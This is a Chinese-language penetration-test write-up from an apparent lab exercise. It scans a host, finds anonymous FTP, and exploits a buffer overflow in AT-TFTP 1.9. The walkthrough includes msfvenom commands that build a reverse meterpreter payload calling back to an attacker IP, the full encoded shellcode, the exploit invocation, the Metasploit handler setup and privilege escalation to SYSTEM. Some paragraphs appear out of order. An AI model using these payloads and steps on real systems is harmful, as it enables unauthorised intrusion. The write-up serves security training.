今天这篇文章主要来分享一个在渗透测试过程中如何通过逐步收集信息并最终拿下目标主机的案例。
实验环境:
渗透过程:
首先进行服务和端口扫描,如下:
# nmap -sT -Pn 10.11.1.226
Starting Nmap 7.50 ( https://nmap.org ) at 2017-09-10 03:35 CST
Nmap scan report for 10.11.1.226
Host is up (0.14s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE
21/tcp open ftp
3389/tcp closed ms-wbt-server
Nmap done: 1 IP address (1 host up) scanned in 35.58 seconds
可见,目标主机开启了ftp和RDP服务。简单测试一下发现,ftp可以匿名登录。# ftp 10.11.1.226
Connected to 10.11.1.226.
220-exploitme
220 Please enter your name:
Name (10.11.1.226:root): anonymous
331 User name okay, Need password.
Password:
230 User logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful.
150 Opening ASCII mode data connection for /bin/ls (468 bytes).
-rwxrw-rw- 1 root root 0 Dec 24 2009 AUTOEXEC.BAT
-rwxrw-rw- 1 root root 0 Dec 24 2009 CONFIG.SYS
drwxrw-rw- 1 root root 0 Sep 19 2011 Documents and Settings
drwxrw-rw- 1 root root 0 Dec 24 2009 ftproot
drwxrw-rw- 1 root root 0 Dec 27 2012 Program Files
drwxrw-rw- 1 root root 0 Jun 16 2016 Python26
drwxrw-rw- 1 root root 0 Apr 20 2016 WINDOWS
drwxrw-rw- 1 root root 0 Dec 24 2009 wmpub
226 Transfer successful.
ftp> cd "Documents and Settings"
250 "/Documents and Settings" is current directory.
ftp> ls
200 PORT command successful.
150 Opening ASCII mode data connection for /bin/ls (108 bytes).
drwxrw-rw- 1 root root 0 Dec 24 2009 All Users
drwxrw-rw- 1 root root 0 Aug 18 2015 joe
226 Transfer successful.
ftp> cd joe
250 "/Documents and Settings/joe" is current directory.
ftp> ls
200 PORT command successful.
150 Opening ASCII mode data connection for /bin/ls (401 bytes).
drwxrw-rw- 1 root root 0 Aug 18 2015 .idlerc
drwxrw-rw- 1 root root 0 Dec 24 2009 Cookies
drwxrw-rw- 1 root root 0 Aug 18 2015 Desktop
drwxrw-rw- 1 root root 0 Sep 19 2011 Favorites
drwxrw-rw- 1 root root 0 Sep 19 2011 My Documents
drwxrw-rw- 1 root root 0 Dec 23 2009 Start Menu
-rwxrw-rw- 1 root root 0 Dec 23 2009 Sti_Trace.log
226 Transfer successful.
ftp> cd Desktop
250 "/Documents and Settings/joe/Desktop" is current directory.
ftp> ls
200 PORT command successful.
150 Opening ASCII mode data connection for /bin/ls (130 bytes).
-rwxrw-rw- 1 root root 694 Dec 24 2009 GuildFTPd FTP Deamon.lnk
-rwxrw-rw- 1 root root 2417 Dec 8 2015 servers.py
226 Transfer successful.
ftp> cat servers.py
?Invalid command
ftp> type servers.py
servers.py: unknown mode
ftp> get servers.py
local: servers.py remote: servers.py
200 PORT command successful.
150 Opening binary mode data connection for /Documents and Settings/joe/Desktop/servers.py (2417 bytes).
226 Transfer complete. 2417 bytes in 1 sec. (2.42 Kb/s).
2417 bytes received in 0.01 secs (413.8064 kB/s)
ftp>
在ftp的目录里发现了一个有趣的文件“servers.py”,因此下载并查看此文件。
# cat servers.py
import wmi, time, ftplib, tftpy
print "[*] Start"
print ""
def isFTPworking():
print "[*] Checking FTP connection..."
try:
ftp = ftplib.FTP('10.11.1.226', timeout=5)
ftp.login()
except:
print "[!] FTP not working!!"
return False
print "[*] FTP is working."
return True
def isTFTPworking():
print "[*] Checking TFTP connection..."
try:
tftp = tftpy.TftpClient('10.11.1.226', 69)
tftp.download("C:/windows/temp/test.txt","C:/windows/temp/test2.txt")
except:
print "[!] TFTP not working!!"
return False
print "[*] TFTP is working."
return True
def killProcess(processname):
print "[*] Killing process: " + processname
try:
c = wmi.WMI()
for process in c.Win32_Process():
if process.Name == processname:
process.Terminate()
except:
print "[!] Exception while killing process"
return True
def startProcess(processpath):
print "[*] Creating process: " + processpath
try:
c = wmi.WMI()
pid, result = c.Win32_Process.Create(processpath)
except IOError:
print "[*] Exception while creating process " + processpath
return
def isProcessAlive(processname):
print "[*] Checking process: " + processname
check = False
try:
c = wmi.WMI()
for process in c.Win32_Process():
if process.Name == processname:
check = True
if not check:
return False
except:
print "[!] Exception while using wmi interface"
return True
if __name__ == '__main__':
ftpproc = 'GuildFTPd.exe'
tftpproc = 'tftpd.exe'
processes = {'GuildFTPd.exe': r'"C:\\Program Files\\GuildFTPd\\GuildFTPd.exe"',
'tftpd.exe': r'"C:\\Program Files\\Allied Telesyn\\AT-TFTP Server 1.9\\tftpd.exe"'}
while True:
for processname in processes.keys():
if not isProcessAlive(processname):
startProcess(processes[processname])
if not isFTPworking():
killProcess(ftpproc)
time.sleep(5)
startProcess(processes[ftpproc])
if not isTFTPworking():
killProcess(tftpproc)
time.sleep(5)
startProcess(processes[tftpproc])
time.sleep(30)
很显然,这是一个用来启动ftp和tftp服务的python脚本。回想起前面我们的扫描结果显示目标主机确实开启了ftp服务,于是猜想可能就是和该脚本有关。从上面的代码可以判断,目标主机安装了AT-TFTP server 1.9。扫描TFTP的端口69(UDP)发现确实是开放的。
# nmap -sU -Pn -p 69 10.11.1.226
Starting Nmap 7.50 ( https://nmap.org ) at 2017-09-10 03:44 CST
Nmap scan report for 10.11.1.226
Host is up (0.12s latency).
PORT STATE SERVICE
69/udp open tftp
MAC Address: 00:50:56:89:7B:69 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 0.54 seconds
Google搜索发现AT-TFTP 1.9存在一个缓冲区溢出的RCE漏洞: 于是,利用下面的步骤生成meterpreter的反弹shell的shellcode,并替换利用脚本atftp.py中相应的shellcode代码: 开启MSF的监听,并执行利用脚本。 总结一下该案例的渗透思路如下:# perl -e 'print "\x81\xec\xac\x0d\x00\x00"' > stackadj
# msfvenom -p windows/meterpreter/reverse_nonx_tcp LHOST=10.11.0.74 LPORT=4444 R > payload
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 177 bytes
# cat stackadj payload > shellcode
# cat shellcode | msfvenom -e x86/shikata_ga_nai -b "\x00" -a x86 --platform win -f python
Attempting to read payload from STDIN...
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 210 (iteration=0)
x86/shikata_ga_nai chosen with final size 210
Payload size: 210 bytes
Final size of python file: 1020 bytes
buf = ""
buf += "\xdd\xc1\xd9\x74\x24\xf4\x58\x33\xc9\xb1\x2e\xbf\x13"
buf += "\x73\xb1\x20\x31\x78\x1a\x03\x78\x1a\x83\xe8\xfc\xe2"
buf += "\xe6\xf2\x5d\x8c\x05\xf5\x9d\x31\x7f\x1e\xda\x21\x86"
buf += "\x1f\x1a\x4e\x18\xd1\x3e\x3a\xa5\x2d\x4a\x41\x68\x36"
buf += "\x4d\x55\x19\x91\x6d\xa8\xf7\x95\x5a\x30\x06\x44\x93"
buf += "\x84\x91\x34\x15\xce\xac\x45\x54\x4b\x6e\x30\xae\x17"
buf += "\x08\x82\x84\xed\x37\xbf\x93\x41\x93\x41\x4d\x3b\x50"
buf += "\x5d\xd4\x4f\x29\x42\xe7\xa6\xb6\x56\x7e\xb1\xd4\x82"
buf += "\x9c\xa3\xdb\x2b\xad\xf8\x47\x27\x8d\xce\x0c\x77\x1e"
buf += "\xa4\x62\x64\xb3\x31\xea\x9c\x95\x23\xb9\xfa\x41\x9f"
buf += "\x0f\x6b\xe5\xac\x5d\x34\x5d\x35\x18\xb8\x3d\x46\x8c"
buf += "\xa8\xed\xeb\x63\x80\x52\x5f\xc0\x75\xdc\xb8\xa0\xf8"
buf += "\x31\x4e\x2e\xac\x9e\x29\x97\xb5\xfe\x49\x31\x5f\xb8"
buf += "\x1e\xd2\x5f\x6c\xc9\x44\xaa\x9a\xf6\xde\xcc\xf4\xe7"
buf += "\x82\x76\x56\x81\xd9\x1d\x48\xc2\x4a\x84\xd1\xb3\x71"
buf += "\xb7\xf4\x6c\xcd\x4b\xa9\xdf\x7a\x07\x2f\x59\x44\x9f"
buf += "\x50\x7f"
接着,我们成功地获得了一个meterpreter的反弹shell,如下:# python atftp.py 10.11.1.226 69 10.11.0.74 9
迁移当前的meterpreter(PID 3716)至一个稳定的进程vmtoolsd.exe(PID 1776), 然后执行getsystem命令进行提权。最终,我们成功地获得了一个SYSTEM权限的meterpreter反弹shell。
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_nonx_tcp
payload => windows/meterpreter/reverse_nonx_tcp
msf exploit(handler) > set LHOST 10.11.0.74
LHOST => 10.11.0.74
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > exploit -j
[*] Exploit running as background job.
[*] Started reverse TCP handler on 10.11.0.74:4444
msf exploit(handler) > [*] Transmitting intermediate stager for over-sized stage...(216 bytes)
[*] Sending stage (171583 bytes) to 10.11.1.226
[*] Meterpreter session 1 opened (10.11.0.74:4444 -> 10.11.1.226:1144) at 2017-09-10 03:57:12 +0800
[+] negotiating tlv encryption
[+] negotiated tlv encryption
[+] negotiated tlv encryption
msf exploit(handler) > sessions
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x86/windows JOE\joe @ JOE 10.11.0.74:4444 -> 10.11.1.226:1144 (10.11.1.226)
0x02 小结